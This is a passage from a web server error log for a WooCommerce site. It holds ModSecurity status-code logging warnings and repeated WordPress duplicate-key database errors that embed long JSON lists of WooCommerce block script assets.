\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.776268 2026] [security2:error] [pid 823496:tid 823659] [client 45.13.225.123:36188] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjpa08mrtyBNpA4PbLQAAAB8"]
[Tue May 26 16:48:38.793455 2026] [lsapi:warn] [pid 823496:tid 823648] [client 45.13.225.123:36174] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.793493 2026] [lsapi:warn] [pid 823496:tid 823648] [client 45.13.225.123:36174] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.793871 2026] [security2:error] [pid 823496:tid 823648] [client 45.13.225.123:36174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjpa08mrtyBNpA4PbKgAAABQ"]
[Tue May 26 16:48:38.800077 2026] [lsapi:warn] [pid 817651:tid 817905] [client 45.13.225.123:36166] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.800109 2026] [lsapi:warn] [pid 817651:tid 817905] [client 45.13.225.123:36166] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-